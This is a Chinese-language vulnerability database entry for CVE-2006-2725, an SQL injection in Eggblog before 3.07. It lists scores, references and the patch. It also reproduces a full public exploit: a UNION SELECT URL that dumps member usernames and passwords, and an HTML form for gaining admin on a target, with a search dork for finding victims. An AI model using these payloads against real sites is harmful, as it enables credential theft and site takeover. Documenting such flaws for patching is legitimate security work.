CVE-2006-2725
CVSS6.4
发布时间 :2006-06-01 06:02:00
修订时间 :2011-03-07 21:36:52
NMCOES    

[原文]SQL injection vulnerability in rss/posts.php in Eggblog before 3.07 allows remote attackers to execute arbitrary SQL commands via the id parameter.


[CNNVD]eggBlog Posts.PHP SQL注入漏洞(CNNVD-200606-006)

        Eggblog 的3.07之前版本的的rss/posts.php中的SQL注入漏洞可让远程攻击者通过id参数执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2725
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2725
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-006
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2030
(UNKNOWN)  VUPEN  ADV-2006-2030
http://www.securityfocus.com/bid/18140
(UNKNOWN)  BID  18140
http://www.securityfocus.com/archive/1/archive/1/435300/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060529 RE: Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities
http://www.securityfocus.com/archive/1/archive/1/435284/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060528 Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities
http://www.nukedx.com/?viewdoc=36
(UNKNOWN)  MISC  http://www.nukedx.com/?viewdoc=36
http://www.nukedx.com/?getxpl=36
(UNKNOWN)  MISC  http://www.nukedx.com/?getxpl=36
http://secunia.com/advisories/20352
(VENDOR_ADVISORY)  SECUNIA  20352
http://xforce.iss.net/xforce/xfdb/26832
(UNKNOWN)  XF  eggblog-posts-sql-injection(26832)

- 漏洞信息

eggBlog Posts.PHP SQL注入漏洞
中危 SQL注入
2006-06-01 00:00:00 2006-06-01 00:00:00
远程  
        Eggblog 的3.07之前版本的的rss/posts.php中的SQL注入漏洞可让远程攻击者通过id参数执行任意SQL命令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Epic Designs eggblog 3.06
        Epic Designs eggblog_v3.07.tar.gz
        http://prdownloads.sourceforge.net/eggblog/eggblog_v3.07.tar.gz?downlo
        ad

- 漏洞信息 (1842)

Eggblog < 3.07 Remote (SQL Injection / Privilege Escalation) Exploit (EDBID:1842)
php webapps
2006-05-28 Verified
0 nukedx
N/A [点击下载]
<!--
Eggblog <= 3.x Multiple Remote Vulnerabilities
Discovered by: nukedx
Contacts: ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: http://www.nukedx.com
Original advisory can be found at: http://www.nukedx.com/?viewdoc=36
Eggblog <= 3.0.6 (rss/posts.php id) Remote SQL injection
Example ->  http://[site]/[EggBlog]/rss/posts.php?id=1'/**/UNION/**/SELECT/**/0,concat('Username:%20',username),concat('Password:%20',password)/**/from/**/eggblog_members/*
This SQL injection will list you all users and passwords.
-->

<html>
<title>Eggblog 2.x Remote Privilege Escalation</title>
<body bgcolor="#000000">
<style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style>
<script language="JavaScript">
function egxpl() {
  if (document.xplt.victim.value=="") {
    alert("Please enter site!");
    return false;
  }
  if (confirm("Are you sure?")) {
    xplt.action="http://"+document.xplt.victim.value+"home/register.php";
    xplt.username.value=document.xplt.username.value;
    xplt.email.value=document.xplt.email.value;
    xplt.password.value=document.xplt.password.value;
    xplt.ref=document.xplt.ref.value;
    xplt.submit();
  }
}
</script>
<strong>
<font class="xpl" color="#00FF40">
<pre>
<center>
Welcome to Eggblog 2.x Remote Privilege Escalation
This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=36
Dork for this exploit: <u>inurl:"powered by eggblog"</u>
Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/eggblog/home/ or www.victim.com/home/
If the site has /eggblog/home in link your target must be www.victim.com/eggblog/
For second example your target must be www.victim.com/
You can login with your admin account via www.victim.com/eggblog/admin/index.php
Have phun
<form name="xplt" method="POST" onsubmit="egxpl();">
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
<input type="text" name="username" value="Enter Username" class="xpl" size="30">
<input type="text" name="email" value="Enter Email" class="xpl" size="30">
<input type="text" name="password" value="Enter Password" class="xpl" size="30">
<input type="hidden" name="ref" value="T">
<input type="submit" value="Send" class="xpl">
</form>
</pre>
</font>
</strong>
</body>
</html>

# milw0rm.com [2006-05-28]
		

- 漏洞信息

25794
eggblog posts.php id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-28 Unknow
2006-05-28 Unknow

- 解决方案

Upgrade to version 3.07 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

eggBlog Posts.PHP SQL Injection Vulnerability
Input Validation Error 18140
Yes No
2006-05-29 12:00:00 2008-01-08 10:39:00
Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI is credited with the discovery of this vulnerability.

- 受影响的程序版本

Epic Designs eggblog 3.06
Epic Designs eggblog 3.07

- 不受影响的程序版本

Epic Designs eggblog 3.07

- 漏洞讨论

eggBlog is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

eggBlog 3.06 is vulnerable to this issue; previous versions may also be affected.

- 漏洞利用

Attackers can exploit this issue through a browser.

An example URI has been provided:

http://www.example.com/[EggBlog]/rss/posts.php?id=[SQL]

- 解决方案

The vendor has released eggBlog 3.0.7 to address this issue.


Epic Designs eggblog 3.06

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站